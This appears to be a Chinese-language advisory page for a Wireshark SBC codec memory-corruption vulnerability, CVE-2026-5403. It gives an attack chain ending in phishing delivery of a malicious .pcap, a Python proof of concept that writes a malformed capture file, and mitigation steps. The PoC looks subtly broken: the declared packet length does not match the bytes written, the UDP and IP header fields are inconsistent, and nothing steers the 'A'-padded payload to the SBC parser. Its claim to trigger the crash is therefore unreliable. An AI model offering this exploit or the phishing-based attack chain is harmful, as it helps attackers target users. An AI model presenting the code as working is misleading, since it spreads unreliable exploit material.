CVE-2026-5403 Wireshark SBC编解码器崩溃漏洞

漏洞信息

漏洞编号

CVE-2026-5403

漏洞类型

拒绝服务, 远程代码执行

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark是一款广泛使用的网络协议分析工具。在4.6.0至4.6.4和4.4.0至4.4.14版本中，SBC编解码器存在一个安全缺陷。攻击者可以通过诱导用户打开包含特制数据包的捕获文件来触发该漏洞。成功利用可能导致应用程序崩溃，造成拒绝服务，在特定条件下还可能导致在系统上执行任意代码，从而威胁机密性、完整性和可用性。

技术细节

该漏洞根因在于Wireshark对SBC（Sub-Band Codec，子带编解码）协议数据包的解析过程中存在内存破坏错误。具体而言，SBC解析器在处理某些畸形或恶意构造的数据包头部字段时，未能正确验证数据长度或边界条件。当解析器尝试读取超出分配缓冲区范围的数据时，会触发堆溢出或空指针解引用。由于攻击向量为本地（AV:L）且需要用户交互（UI:R），攻击者通常利用社会工程学手段，诱骗受害者打开恶意.pcap文件。一旦触发崩溃，若攻击者能控制溢出的内存布局，可能覆盖关键函数指针，进而劫持程序执行流，实现本地代码执行。

攻击链分析

STEP 1

侦察

攻击者确认目标系统正在运行易受攻击版本的Wireshark（4.6.0-4.6.4 或 4.4.0-4.4.14）。

STEP 2

制作载荷

攻击者编写脚本生成包含特制SBC数据包的恶意.pcap文件，该文件旨在触发解析器中的内存破坏漏洞。

STEP 3

投递

攻击者通过网络钓鱼或其他社会工程学手段，将恶意.pcap文件发送给受害者，诱导其下载。

STEP 4

利用

受害者使用易受攻击的Wireshark版本打开该文件，解析器处理恶意数据包时发生崩溃或执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# This script generates a malformed pcap file to trigger the SBC codec crash.
# It creates a dummy global header followed by a crafted packet header
# and a malformed SBC payload designed to overflow the parser.

def generate_malformed_pcap(filename):
    # PCAP Global Header (Little Endian)
    pcap_global_header = struct.pack('<IHHIIII', 
        0xa1b2c3d4,  # magic number
        2,           # version major
        4,           # version minor
        0,           # thiszone
        0,           # sigfigs
        65535,       # snaplen
        1            # network (Ethernet)
    )

    # Packet Header (Timestamps and length)
    # We set the captured length and actual length to a large value
    packet_header = struct.pack('<IIII', 
        0, 0,        # ts_sec, ts_usec
        1000,        # incl_len (captured length)
        1000         # orig_len (original length)
    )

    # Ethernet Header (Dummy)
    eth_header = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00'

    # IP Header (Dummy)
    ip_header = b'\x45\x00\x00\x1c\x00\x00\x40\x00\x40\x11\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01'

    # UDP Header (Dummy)
    udp_header = b'\x00\x00\x00\x00\x00\x08\x00\x00'

    # SBC Payload (Malformed)
    # Constructing a payload that violates the SBC codec parsing logic
    # to trigger the buffer overflow/crash.
    # Sending a large block of 'A's to simulate overflow
    malicious_payload = b'\x9C' + b'A' * 500 

    with open(filename, 'wb') as f:
        f.write(pcap_global_header)
        f.write(packet_header)
        f.write(eth_header)
        f.write(ip_header)
        f.write(udp_header)
        f.write(malicious_payload)

    print(f"[+] Malformed PCAP file generated: {filename}")
    print("[+] Open this file in the vulnerable Wireshark version to trigger the crash.")

if __name__ == "__main__":
    generate_malformed_pcap("crash_sbc.pcap")

影响范围

Wireshark 4.4.0 - 4.4.14

Wireshark 4.6.0 - 4.6.4

防御指南

临时缓解措施

在无法立即升级的情况下，建议用户在Wireshark中禁用SBC协议解析器（通过“分析”->“启用的协议”中搜索SBC并取消勾选）。此外，应严格限制对捕获文件的来源审查，不要随意打开未经验证的.pcap文件。